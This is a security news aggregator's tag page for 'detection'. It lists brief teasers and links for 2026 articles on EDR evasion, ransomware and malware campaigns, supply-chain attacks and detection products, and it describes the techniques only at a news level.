Tag: detection
-
Fingerprint launches AI assistant detection tools
First seen on scworld.com Jump to article: www.scworld.com/brief/fingerprint-launches-ai-assistant-detection-tools
-
AI-built ransomware toolkit automates EDR evasion, AD discovery
A threat actor is using an AI-built ransomware attack toolkit that automates Active Directory discovery and helps evade endpoint detection and response (EDR) solutions. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ai-built-ransomware-toolkit-automates-edr-evasion-ad-discovery/
-
AI-built ransomware toolkit automates EDR evasion, AD discovery
A threat actor is using an AI-built ransomware attack toolkit that automates Active Directory discovery and helps evade endpoint detection and response (EDR) solutions. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/ai-built-ransomware-toolkit-automates-edr-evasion-ad-discovery/
-
Why the browser is now the front line for AI security
AI-powered attacks and shadow AI adoption are creating new security risks inside the browser. Push Security explains why browser visibility is becoming critical for both threat detection and AI governance. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/why-the-browser-is-now-the-front-line-for-ai-security/
-
(g+) Echtzeitüberwachung: Endpoint Security neu gedacht
Endpoint-Detection-and-Response-Systeme werden zum Kern moderner Security Operations. Sie überwachen Prozesse, Identitäten und Verhalten in Echtzeit. First seen on golem.de Jump to article: www.golem.de/news/echtzeitueberwachung-endpoint-security-neu-gedacht-2606-209271.html
-
How Leading Organizations Are Turning EDR Into Operational Resilience
Most organizations now recognize that endpoint protection alone is no longer sufficient.That’s why adoption of endpoint detection and response (EDR) has accelerated rapidly in recent years. Organizations understand that modern attacks move faster, evade traditional prevention controls, and require continuous visibility into suspicious activity across the environment.But owning EDR First seen on thehackernews.com Jump to…
-
Sophos uncovers AI-powered malware lab built for EDR evasion
A threat actor used AI technologies to build a malware-testing framework for developing and refining endpoint detection and response (EDR) evasion techniques, according to … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2026/06/02/ai-agents-edr-evasion-techniques/
-
Iranian Hackers Hijack AppDomainManager to Bypass EDR
Iran-linked hackers have upgraded their tradecraft by using AppDomainManager hijacking in .NET applications to turn off security telemetry before malicious code fully starts, making endpoint detection and response tools much harder to spot the attack. The campaign, attributed to the Iran-nexus group Screening Serpens, pairs this technique with DLL sideloading, fake job lures, and staged…
-
Ein SOC steht in keinem Regulierungstext – Compliance braucht Detection und Response, kein SOC
First seen on security-insider.de Jump to article: www.security-insider.de/soc-mythos-nis2-dora-cra-detection-response-betriebsmodell-a-08d0a949ea491c1348d52aef22c9639e/
-
Agentisches Security-Operations-Center von Sophos verkürzt die Reaktionszeit auf Bedrohungen auf 89 Sekunden
Sophos gab Produktionsergebnisse aus einem vollständigen Jahr agentischen Betriebs von Sophos-Managed-Detection and Response (MDR) bekannt. Der Dienst schützt inzwischen weltweit 40.000 Kunden und verzeichnet ein Wachstum von 39 Prozent gegenüber dem Vorjahr. Die Ergebnisse zeigen, wie ein agentisches Security-Operations-Center (SOC) im großen Maßstab funktioniert. Telemetriedaten explodieren, IT-Stacks werden komplexer und gleichzeitig fehlen weltweit Cybersicherheitsfachkräfte. Traditionelle…
-
Lazarus APT unveils fileless remote access Trojan designed to evade detection
North Korea-linked Lazarus APT Group is using a stealthy memory-only RAT that leaves almost no forensic traces behind. North Korea-linked APT group Lazarus has never been shy about its ambitions, the threat actor has been tied to some of the most audacious financial heists in recent memory, draining hundreds of millions from cryptocurrency exchanges and…
-
Ransomware Uses ChaCha20 and Curve25519 to Encrypt Windows Files
Payload ransomware is a new Windows ransomware family that combines ChaCha20 stream encryption with per-file Curve25519 ECDH key exchange, making victim data effectively unrecoverable without the attackers’ private key. It also implements strong anti-forensics, including ETW patching, VSS deletion, event log wiping, and aggressive process/service termination to hinder detection and recovery. Payload first appeared publicly…
-
InvisibleFerret Malware Uses .pyd and .so Files to Evade Script Detection
A North Korea-linked threat group, Void Dokkaebi, also known as Famous Chollima, has significantly upgraded its malware delivery techniques by converting its Python-based InvisibleFerret malware into compiled binary modules. InvisibleFerret was previously deployed as readable Python scripts, making it easier for defenders to detect through static analysis and signature-based tools. The latest campaign leverages Cython,…
-
The Alert Firehose Finally Meets Its Match
Ask a cybersecurity pro about Network Detection and Response (NDR) and you might still hear “Noisy,” “Too much data.” But ask the teams running NDR that includes agentic AI capabilities and you’ll hear they’re actually using it to catch threats earlier, triage faster, and chase fewer false positives. The old complaint lingers in part because…
-
Hackers Hide Linux Malware in SSH-Like Package Filename
Hackers have been observed disguising a malicious Linux payload under an SSH-like filename during software installation, as part of a coordinated supply chain attack targeting developer ecosystems. The attack hinges on a hidden post-install script embedded inside package.json, rather than the expected composer.json used in PHP environments. This subtle placement allows the malicious code to evade detection during routine dependency…
-
WantToCry ransomware evades detection through SMB abuse, remote encryption
First seen on scworld.com Jump to article: www.scworld.com/news/wanttocry-ransomware-evades-detection-through-smb-abuse-remote-encryption
-
Fake Android Apps Commit Carrier Billing Fraud for Premium Services
The disguised apps use WebView automation, JavaScript injection, and OTP interception to avoid detection and complete fraudulent subscriptions. First seen on darkreading.com Jump to article: www.darkreading.com/mobile-security/fake-android-apps-carrier-billing-fraud
-
WantToCry Ransomware Exploits SMB to Encrypt Remote Files
A new ransomware campaign named “WantToCry” that leverages exposed Server Message Block (SMB) services to gain access and encrypt victim data without deploying traditional malware on compromised systems. This approach significantly reduces the detection surface, making it harder for conventional security tools to identify the attack. The name “WantToCry” appears to reference the infamous WannaCry…
-
New GhostTree Attack Causes EDR Tools to Hang, Leaving Files Unscanned
A newly disclosed attack technique dubbed “GhostTree” is raising concerns among defenders after researchers demonstrated how it can disrupt endpoint detection and response (EDR) tools and bypass file scanning mechanisms on Windows systems. The technique, discovered by Varonis Threat Labs, abuses NTFS junctions to create recursive directory structures that can cause security tools to hang indefinitely. New…
-
Fake Android Apps Commit Carrier Billing Fraud for Premium Svcs.
The disguised apps use WebView automation, JavaScript injection, and OTP interception to avoid detection and complete fraudulent subscriptions. First seen on darkreading.com Jump to article: www.darkreading.com/mobile-security/fake-android-apps-carrier-billing-fraud
-
Typosquatting Is No Longer a User Problem. It’s a Supply Chain Problem
AI-generated lookalike domains are now embedded inside the third-party scripts running on your web properties. Here’s why your current stack can’t see them, and what detection actually requires.Download the CISO Expert Guide to Typosquatting in the AI Era →TL;DR Typosquatting is no longer a user problem. Attackers now embed lookalike domains inside legitimate third-party scripts.…
-
Internet Explorer may be dead, but its ghost still runs malware
A legacy Windows tool that refuses to die: Bitdefender’s findings suggest MSHTA remains attractive because it checks several boxes attackers like. These include it being Microsoft-signed, preinstalled on Windows, capable of in-memory execution, and still implicitly trusted in many environments.Other sophisticated campaigns picked it up too. Bitdefender detailed PurpleFox using MSHTA to launch ‘msiexec’ commands…
-
JavaScript Malware Campaign Drops Crypto Clipper via PowerShell
A large-scale CountLoader campaign that uses layered obfuscation, multi-stage payload delivery, and covert command-and-control (C2) communication to deploy cryptocurrency clipper malware. The campaign stands out for its complex infection chain, combining JavaScript, PowerShell, and in-memory shellcode execution to evade detection and maintain persistence across infected systems. The attack begins with a malicious executable that launches…
-
How to Reduce Phishing Exposure Before It Turns into Business Disruption
What happens when a phishing email looks clean enough to pass through security, but dangerous enough to expose the business after one click? That is the gap many SOCs still struggle with: the attacks that leave teams unsure what was exposed, who else was targeted, and how far the risk has spread.Early phishing detection closes…
-
Continuous Detection, Continuous Response: Mate Security Redefines the Modern SOC
New York, USA, 18th May 2026, CyberNewswire First seen on hackread.com Jump to article: hackread.com/continuous-detection-continuous-response-mate-security-soc/
-
Gremlin Stealer Hides Payloads in .NET Resources to Evade Detection
A newly discovered variant of the Gremlin Stealer is raising concerns among security researchers by adopting stealth-focused techniques that significantly reduce its detection footprint. Gremlin Stealer is an information-stealing malware actively sold on Telegram. It targets a wide range of sensitive data from infected systems, including payment card details, browser cookies, session tokens, cryptocurrency wallets,…
-
Why the best security investment a board can make in 2026 isn’t another tool
Tags: access, ai, api, attack, automation, breach, cloud, credentials, data, detection, endpoint, governance, monitoring, network, risk, service, technology, toolAttackers don’t break through your defenses. They walk between them: The most effective attacks today don’t target any single tool’s coverage area. They move through the seams. An attacker who compromises a valid credential doesn’t trigger endpoint detection. An attacker who moves from one cloud service to another using legitimate trust relationships doesn’t trip network…